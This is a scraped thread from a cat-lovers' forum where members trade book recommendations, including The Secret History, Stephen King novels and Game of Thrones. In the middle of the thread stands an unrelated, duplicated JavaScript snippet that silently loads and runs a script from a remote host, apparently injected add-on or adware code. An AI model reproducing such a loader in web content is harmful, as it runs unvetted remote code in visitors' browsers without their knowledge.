What are you reading? The Sequel.

Status
Not open for further replies.

mamakat10

TCS Member
Kitten
Purraise
I just read a fantabulous all-ages-type novel about fostered kitties in a used bookshop. Not a fantasy, but so sweet without being cutesy. I love it! The message, really, is that businesses should foster cats from their local shelters and what a wonderful thing that is for the cats and the community. It is cat-centric without being overdone. The story is clean and nice and funny for kids and adults both. It's called Shelve Under C: A Tale of Used Books and Cats by Jenny Kalahar. I talk about it a lot but wish it was better known. The writing is excellent, not that amateur stuff of so many books nowadays. I also have read Dewey, but I liked Shelve Under C much better. The stuff on the bookshop and rare books is interesting and fun. Another book I recommend often is Jennie by Paul Gallico. It was also published as The Abandoned. It's great with such a real feel of what it would be like to be transformed into a cat. A lot of that book will totally break your little heart! Thanx -- Judy

• Thread Starter Thread Starter

Winchester

In the kitchen with my cookies
Veteran
Purraise
Normally I do.
The Shining (Stephen King) scared me so badly back in....oh 1978 or so, I swore I never would read another scary book.
It was pure impulse that led me to pick up Silence of the Lambs, and having once started, they were so riveting I had to read them all.
Having said that guess what I'm reading now?.......
...Just finished Flowers In The Attic and now on Petals on the Wind, VC Andrews.

Wait a minute...speaking of Stephen King, The Stand (the complete version) is one of my absolute favorite books. I re-read it at least every other year. And I like Salem's Lot and The Dead Zone too. So..I guess I do have a slight taste for the scary after all.
But yeah, they give me nightmares. Boy I don't think I slept a single night while I was reading The Historian (Elizabeth Kostova)
I'm a huge Stephen King fan and loved The Shining. Both the book and the movie scared the heck out of me. And while the novel Christine didn't bother me, the movie did. It was a long time before I could drive by myself during the night hours and not think of that book. I really enjoyed The Stand, too.

Otto, I thought The Historian was great! I've thought about buying it for my Nook because it would be worth it to re-read. I read Flowers in the Attic, but that was the only book of hers I ever read.
Or Shirley Rousseau Murphy's Joe Grey series?
After spending summer vacation reading a lot of medieval history, I've just switched back to "cat mysteries" and found a trio of them by an author I'd never heard of before: Copycat Killing, Sleight of Paw and Curiosity Thrilled the Cat by Sofie Kelly. They're pretty good.
I read Sleight of Paw and liked it....I haven't read her other books yet.
I am currently reading the Secret Circle series by L.J. Smith. I love them.

I liked the Secret Circle, but not as much as the Vampire Diaries.

Right now, I'm reading Canada by Richard Ford, which is set back in the mid-1900s. The parents committed a bank robbery and went to jail. The twin teenagers are pretty much on their own and the son went to Canada and is living there. I'm about half-way through the book and it's cumbersome at times.

Also:

Power Blind - Stephen Gore

The Uninvited - Heather Graham

The White Devil - Justin Evans

Seating Arrangements - Maggie Shipstead (Very slow-going and I realized that I didn't care how it ended)

Last edited:

catspaw66

TCS Member
Veteran
Purraise
I would like to suggest a few series of books that I like.

The Discworld series - comedy, magic, serious subjects and nonsense all together in each book.  By Terry Pratchett

The Xanth series - magic, creatures and loads of puns.  by Piers Anthony

The Honorverse series - science fiction - follows the career of Naval hero Honor Harrington. Has treecats in it.  By David Weber

The Redwall Abbey series - mice, otters, badgers on good side.  Weasels, stoats, rats on evil side.  By Brian Jacques

I know this doesn't tell much about each set, but if you are interested, google the author and look at the lists.  Some of them can be gotten for free online.

kluchetta

TCS Member
Top Cat
Purraise
Im rereading "The Secret History" by Donna Tartt

I can't for the life of me figure out what it is about this book that makes me love it so much.  But someone from here recommended it, and they didn't know why they liked it so much either. So I was intrigued!  I've since recommended it to others, and they all loved it, but had no idea why!

Well worth the read!
I absolutely LOVE THIS BOOK! And I don't know why either. I think it has something to do with the fact that you know exactly what is going to happen, and yet it's so well written it doesn't matter. READ IT, it's fantastic!

natalie_ca

TCS Member
Top Cat
Purraise
I absolutely LOVE THIS BOOK! And I don't know why either. I think it has something to do with the fact that you know exactly what is going to happen, and yet it's so well written it doesn't matter. READ IT, it's fantastic!
Yay!!! I'm so happy that there is someone else who also loves this book.  I keep it on my eReader and when I need a break from what I'm reading, I turn to The Secret History.

Who is your favourite character?  Mine is Henry.  He is the person ultimately behind every awful event that takes place; yet he's so charismatic and obsessively intriguing.

The author does an excellent job at developing her characters and she is a very well rounded writer. I think that is what I find so attractive about this book. The story is brilliantly told. She takes you behind the scenes and right into the characters' psyche.  Few authors can achieve what she has done in this book.
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();

kluchetta

TCS Member
Top Cat
Purraise
I am absolutely in love with this book. I can't even think who my favorite character is. I think it is the "setting." When he describes Plano, you feel absolutely desolate. When he describes the house in the country you feel its charm but aloofness. His dorm room: spartan but welcoming. AND THE WAREHOUSE! OMG!!! SUCH good descriptions...you actually feel it. I love his (her? haha) descriptions of Camilla especially. "all slender wrists and tousled hair." SIGH....I read this book outloud to a very good friend over skype over a period of a couple of months. I SO enjoyed doing all of the voices. I fell in love with the book even more! I read it almost every year.

otto

TCS Member
Top Cat
Purraise
The Language of Flowers by Vanessa Diffenbaugh. I LOVE this book.

otto

TCS Member
Top Cat
Purraise
Thanks to those who mentioned The Secret History by Donna Trett. Having read your comments I ordered it from the library and I cannot put it down! :clap:

While I was waiting for it to come in I read My Side of the Mountain by Jean George. That's a favorite re-read of mine but it's been a few years since I read it. I enjoyed it as much as always, and have ordered the movie from netflix. I remember seeing the movie when I was a little girl, my mother took us to a double feature drive in. We saw My Side of the Mountain and The Heart Is a Lonely Hunter. (also a good book, by Carson McCullers) I have added both to my netfilix queue, as I can never seem to think of one without the other since that time.

Because of that, I have ordered The Heart Is a Lonely Hunter from the library, as my own copy, which I usually keep with My Side of The Mountain since they go together in my mind, seems to have gotten lost. :(

But in the mean time, The Secret History is riveting.

natalie_ca

TCS Member
Top Cat
Purraise
Thanks to those who mentioned The Secret History by Donna Trett. Having read your comments I ordered it from the library and I cannot put it down!
And I bet you can't figure out why you like it so much,  lol

I'm just starting the 4th book of Game of Thrones - "A Feast of Crows"

kluchetta

TCS Member
Top Cat
Purraise
Thanks to those who mentioned The Secret History by Donna Trett. Having read your comments I ordered it from the library and I cannot put it down!

While I was waiting for it to come in I read My Side of the Mountain by Jean George. That's a favorite re-read of mine but it's been a few years since I read it. I enjoyed it as much as always, and have ordered the movie from netflix. I remember seeing the movie when I was a little girl, my mother took us to a double feature drive in. We saw My Side of the Mountain and The Heart Is a Lonely Hunter. (also a good book, by Carson McCullers) I have added both to my netfilix queue, as I can never seem to think of one without the other since that time.
Because of that, I have ordered The Heart Is a Lonely Hunter from the library, as my own copy, which I usually keep with My Side of The Mountain since they go together in my mind, seems to have gotten lost.

But in the mean time, The Secret History is riveting.
 I'm SO GLAD you love the book too! Isn't it amazing?

jcat

Mo(w)gli's can opener
Veteran
Purraise
I'm rereading James Herriot and have finished All Creatures Great and Small as well as All Things Bright and Beautiful. I've got about 1/3 of All Things Wise and Wonderful to go.

otto

TCS Member
Top Cat
Purraise
I'm rereading James Herriot and have finished All Creatures Great and Small as well as All Things Bright and Beautiful. I've got about 1/3 of All Things Wise and Wonderful to go.
I just finished those too. Some of my favorite re-reads. :)

Still on The Secret History, but when I need a rest from it I've been indulging myself with the All Of A Kind Family series by Sydney Taylor. (Childrens' books)

natalie_ca

TCS Member
Top Cat
Purraise
I'm about 70 pages into the 5th book of the Game of Thrones series. I just can't put the books down!  My eReader is working overtime.Today my reader needed charging, but I didn't want to stop reading, so I sat in the kitchen reading and used my phone cord to charge it from the wall outlet (much faster than charging using the computer cpu).

kittykisses

TCS Member
Kitten
Purraise
I completely agree about Dean Koonz! My favorite genre is science fiction.

I'm currently reading "The Passage" which is a different take on vampires. So far it's captivating. The author is really good.

I'd like to suggest a cute cat book - The Cat Who Went to Paris. It's true stories about a guy who travels with his cat. It's a really unusual cat!

natalie_ca

TCS Member
Top Cat
Purraise
FInally finished the last (most current) book of Fire and Ice series (Game of Thrones). Excellent books!  Can't wait for the next one.  But it will be 2 years at least! :(

Back to trying to read War and Peace.  I think I'm going to have to read the summarized cheat study book first to get an understanding of what this book is about.  Maybe then I'll be able to get into the book!  So far I'm finding it totally utterly boring!  I read 4 chapters before and put it aside, and when I picked it up again I couldn't recall what I had previously read, so now I"m back to the beginning.

I feel so badly for any kid who was forced to read this for high school English. If I had been made to read this book in high school, I would have failed the class for sure.  lol

catspaw66

TCS Member
Veteran
Purraise
For a completely different look on vampire stories, read Christopher Moore's Love Story series - Bloodsucking Fiends, You Suck and Bite Me.  Imagine vampires as written by Douglas Adams. 

natalie_ca

TCS Member
Top Cat
Purraise
Gave up on War and Peace!  LOL

Now I'm reading the latest Catherine Coulter novel called "Back Fire" or something like that. It's an FBI thriller with the star characters being a husband and wife.

otto

TCS Member
Top Cat
Purraise
Two books. Jane Eyre and For Whom The Bell Tolls. Jane Eyre at home, but because it is a large hard cover book I had to have something portable, so I started the Hemingway novel, too. Both, of course, are excellent. Jane Eyre I read every few years but I haven't read For Whom The Bell Tolls in probably 20 years, so it's pretty fresh.

Status
Not open for further replies.